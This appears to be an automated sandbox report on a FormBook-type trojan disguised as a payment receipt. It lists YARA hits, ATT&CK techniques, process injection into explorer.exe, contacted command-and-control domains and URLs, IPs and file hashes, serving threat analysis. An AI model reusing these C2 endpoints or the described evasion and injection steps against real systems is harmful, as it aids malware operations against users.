          Source: Yara matchFile source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 320833 Sample: Final-Payment-Receipt.exe Startdate: 19/11/2020 Architecture: WINDOWS Score: 100 31 g.msn.com 2->31 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Yara detected AntiVM_3 2->43 45 5 other signatures 2->45 11 Final-Payment-Receipt.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\...\Final-Payment-Receipt.exe.log, ASCII 11->29 dropped 55 Tries to detect virtualization through RDTSC time measurements 11->55 57 Injects a PE file into a foreign processes 11->57 15 Final-Payment-Receipt.exe 11->15         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 18 explorer.exe 15->18 injected process9 dnsIp10 33 www.wacrox.com 162.0.236.49, 49730, 80 NAMECHEAP-NETUS Canada 18->33 35 trumpingitagain.com 27.123.27.33, 49731, 80 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 18->35 37 4 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 wlanext.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Final-Payment-Receipt.exe34%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          Final-Payment-Receipt.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.Final-Payment-Receipt.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ980%Avira URL Cloudsafe
          http://www.wacrox.com/71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr0%Avira URL Cloudsafe
          http://www.trumpingitagain.com/71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.wacrox.com
          		162.0.236.49
          		truetrue
            		unknown
            themindofafunnygirl.com
            		192.0.78.230
            		truetrue
              		unknown
              trumpingitagain.com
              		27.123.27.33
              		truetrue
                		unknown
                g.msn.com
                		unknown
                		unknownfalse
                  		high
                  www.themindofafunnygirl.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.azarblock.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.trumpingitagain.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.wacrox.com/71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhrtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.trumpingitagain.com/71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhrtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhrtrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.comexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98wlanext.exe, 00000003.00000002.492344982.00000000041AF000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.tiro.comexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.goodfont.co.krexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comlexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://fontfabrik.comexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fonts.comexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFinal-Payment-Receipt.exe, 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.sakkal.comexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              27.123.27.33
                                              		unknownAustralia
                                              		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                              192.0.78.230
                                              		unknownUnited States
                                              		2635AUTOMATTICUStrue
                                              162.0.236.49
                                              		unknownCanada
                                              		22612NAMECHEAP-NETUStrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:320833
                                              Start date:19.11.2020
                                              Start time:22:18:38
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 8s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:Final-Payment-Receipt.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:22
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@7/1@5/3
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 10% (good quality ratio 9.2%)
                                              • Quality average: 75.1%
                                              • Quality standard deviation: 30.2%
                                              HCA Information:
                                              • Successful, ratio: 97%
                                              • Number of executed functions: 99
                                              • Number of non-executed functions: 188
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.210.248.85, 51.11.168.160, 40.88.32.150, 20.54.26.129, 52.230.222.68, 2.20.142.210, 2.20.142.209, 52.142.114.176, 92.122.213.194, 92.122.213.247, 51.104.144.132
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, skypedataprdcoleus15.cloudapp.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, dm3p.wns.notify.windows.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              22:19:29API Interceptor1x Sleep call for process: Final-Payment-Receipt.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              AUTOMATTICUShttps://app.clio.com/link/AxWtfjmmzhjaGet hashmaliciousBrowse
                                              • 192.0.77.37
                                              KYC_DOC_.EXEGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              https://duemiglia.comGet hashmaliciousBrowse
                                              • 192.0.77.48
                                              http://homeschoolingteen.comGet hashmaliciousBrowse
                                              • 192.0.73.2
                                              https://facialxpressions.com/mox/Get hashmaliciousBrowse
                                              • 192.0.77.48
                                              https://www.women.com/alexa/quiz-dialect-testGet hashmaliciousBrowse
                                              • 192.0.77.40
                                              dB7XQuemMc.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              Amazon-Service-Center[2368].docxGet hashmaliciousBrowse
                                              • 74.114.154.17
                                              Amazon-Service-Center[2368].docxGet hashmaliciousBrowse
                                              • 74.114.154.17
                                              http://www.bananalife.com.au/Get hashmaliciousBrowse
                                              • 192.0.77.48
                                              https://10009907.createsend1.com/t/t-l-xdrsjk-l-r/#bWFyay5ibHVtQGNvZ25pYW4uY29tGet hashmaliciousBrowse
                                              • 192.0.73.2
                                              https://10009907.createsend1.com/t/t-l-xdrsjk-l-r/#bWFyay5ibHVtQGNvZ25pYW4uY29tGet hashmaliciousBrowse
                                              • 192.0.73.2
                                              jtFF5EQoEE.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              4lsCTb3dCs.xlsxGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              KYC-DOC-11-10.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              http://fromdoctopdf.comGet hashmaliciousBrowse
                                              • 192.0.73.2
                                              JwekqCZAwt.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              https://achas.com.br/wp-includes/certificates/ssl.htmlGet hashmaliciousBrowse
                                              • 192.0.77.48
                                              http://srjbtkshetra.orgGet hashmaliciousBrowse
                                              • 192.0.77.37
                                              ORDER LIST.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              NAMECHEAP-NETUSPayment Advice.xlsGet hashmaliciousBrowse
                                              • 185.61.154.32
                                              Payment Advice.xlsGet hashmaliciousBrowse
                                              • 185.61.154.32
                                              Payment Advice.xlsGet hashmaliciousBrowse
                                              • 185.61.154.32
                                              Documentation.478396766.docGet hashmaliciousBrowse
                                              • 198.187.31.83
                                              Documentation.478396766.docGet hashmaliciousBrowse
                                              • 192.64.118.88
                                              tl2gnGyMz6eLhZG.exeGet hashmaliciousBrowse
                                              • 104.219.248.45
                                              Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                              • 185.61.154.55
                                              74725794.no.exeGet hashmaliciousBrowse
                                              • 198.54.122.60
                                              Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                              • 198.54.120.58
                                              invoice payment.exeGet hashmaliciousBrowse
                                              • 185.61.154.32
                                              Certificates Profile Details Of Our Company.exeGet hashmaliciousBrowse
                                              • 198.54.122.60
                                              https://lfonoumkgl.zizera.com/FXGet hashmaliciousBrowse
                                              • 199.188.200.253
                                              xgarnica.exeGet hashmaliciousBrowse
                                              • 198.54.122.60
                                              mcaceres.exeGet hashmaliciousBrowse
                                              • 198.54.122.60
                                              https://bxjg2oj292.zizera.com/F00929377Get hashmaliciousBrowse
                                              • 199.188.206.63
                                              Invoice Copy.exeGet hashmaliciousBrowse
                                              • 198.54.114.191
                                              DHL-#AWB130501923096PDF.exeGet hashmaliciousBrowse
                                              • 198.54.122.60
                                              https://agrabadconventionhall.com/redirect-outlook.com/server%20configuration/?#info@herbertarchitekten.deGet hashmaliciousBrowse
                                              • 198.187.31.56
                                              https://agrabadconventionhall.com/redirect-outlook.com/server configuration/Get hashmaliciousBrowse
                                              • 198.187.31.56
                                              https://bitly.com/35yFnnsGet hashmaliciousBrowse
                                              • 199.188.206.78
                                              DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU5Y3AbEmKxxY4ejt.exeGet hashmaliciousBrowse
                                              • 122.201.127.25
                                              invoice copy.exeGet hashmaliciousBrowse
                                              • 122.201.127.25
                                              90720.PDF.exeGet hashmaliciousBrowse
                                              • 122.201.127.25
                                              https://u18325032.ct.sendgrid.net/ls/click?upn=zS4zgBLRdqv-2B8jn6xdf2prIW-2Bu5RRqsJyRDox4UcGzXlLtZXKh-2BSZdYmhDPT7JGY4jxX_Y1wbDkFnclmd8Iup-2B4obtvYZ24jPnz-2FkCjwAJL5h1-2FUBiIZmBuxEzumh2vThqzs2MwOT8FwJ8EPBcEqg6KP-2FycJk-2F2Va4xgWqgk41eigoMKxSZCslQPYXXJTyBLhSNnf-2FfHuS9v-2BJ6gVlX2IldcbNV25S-2BhGKJ5ikDOjb6VKofpcSIJXj1RoRTBvsEmhfCwVKltNYHEeFV48egnRV6V4KnWoMHJ0Sj-2FwN2JHgUk1ZLcdijUJ-2Bz8-2FDXEgLBt4rnAaQR9NzHZrmoV6P0aYzw0QuOxTSkkyqxmlnATSVT76aW7xbupQFoWh65cZ12v40MRzaEHHdF38GJ3uTfQW-2FL0NpWtRpYTANHNCKEohMPQe-2BQvVeiILsQLZjGcPM9qRTD6v3q2Koik3PCTOfELr7SJHVJY7-2FfCS-2BMUdcVtrDR-2BT9SiInIdMsClC9ybdnqOy5qGoBL7ypaxonRJiRN5Ers-2BpXaekLUh980nmBrVhHhwMdhi3L9KJrNPzhUU2H-2F1W-2Bq8opHNx9G-2B2RERjjdpx8RREqR0-2BzlM-2Bule7-2FMQhvBR6-2FjBll-2BgcoS81hY1tr13MrGzIJEGC1sQXW6fx-2FUZxi-2BzZCRUyPRKMtUCBDApOpKHWFa28-2F8DrubD1Bqk2SUfTwOwvM1FZgJBQ66Khrcbm9CA2tY2mEvZ5sEIq0yife1LwRAkqrVJZOTwMsA0MNcwj-2B1ZpzIYx6y44ztvnDqRgupi8ATB2cQ6bqD-2FrXW32fRGw5fsVPzDvRhiRpb2MihVrYIJrCyHi4hDKuc56hJf0-2FIuUaTsEQt1b6LkoY0bm75M5K6SjYZb0-2B74T8xAcm7NEpMPpOxV5Fzod0iD0BcPB7FjV7FeKzarzQt8yEOK2aNEcxP6aXH7-2FgCgNZbxgs0wahAt1mmUZjNVwg6A-2Fkp-2BPT6-2F-2Fdi5-2FvmuSDwaZbzYamcNlNmA-3DGet hashmaliciousBrowse
                                              • 103.20.200.137
                                              BsMdJnus2L.exeGet hashmaliciousBrowse
                                              • 103.67.235.120
                                              WhTpMNHuhn.exeGet hashmaliciousBrowse
                                              • 203.170.80.250
                                              QUOTE192.exeGet hashmaliciousBrowse
                                              • 103.67.235.120
                                              http://britishgas-login-verify.oasisministries.org.au/Get hashmaliciousBrowse
                                              • 116.0.20.51
                                              New Order.exeGet hashmaliciousBrowse
                                              • 103.67.235.120
                                              http://britishgas.co.uk-setup-info-billing-id61.hbct.com.au/Get hashmaliciousBrowse
                                              • 116.0.20.51
                                              https://isvconstructions.com.au/iso/?p=LFsAXVB1up6wUN57xRREGPHmGet hashmaliciousBrowse
                                              • 116.0.23.224
                                              ENQ-015August 2020 R1 Proj LOT.docGet hashmaliciousBrowse
                                              • 103.67.235.120
                                              http://relianceassure.comGet hashmaliciousBrowse
                                              • 163.47.74.144
                                              TNT Shipping Documents_pdf.exeGet hashmaliciousBrowse
                                              • 122.201.97.187
                                              260820MT103 Transfer_pdf.exeGet hashmaliciousBrowse
                                              • 122.201.97.187
                                              BL DRAFT_pdf.exeGet hashmaliciousBrowse
                                              • 122.201.97.187
                                              Sample__IMG.exeGet hashmaliciousBrowse
                                              • 203.170.80.250
                                              DRAFT HBL LGB07200191_pdf.exeGet hashmaliciousBrowse
                                              • 122.201.97.187
                                              INSPECTION FOR H&H - NEW ORDERS.exeGet hashmaliciousBrowse
                                              • 122.201.97.187
                                              Offer10044885_BMElectricalWholesaleLtd_08_06_2020.xlsmGet hashmaliciousBrowse
                                              • 203.170.83.97

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Final-Payment-Receipt.exe.log
                                              Process:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1314
                                              Entropy (8bit):5.350128552078965
                                              Encrypted:false
                                              SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                              MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                              SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                              SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                              SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                              Malicious:true
                                              Reputation:high, very likely benign file
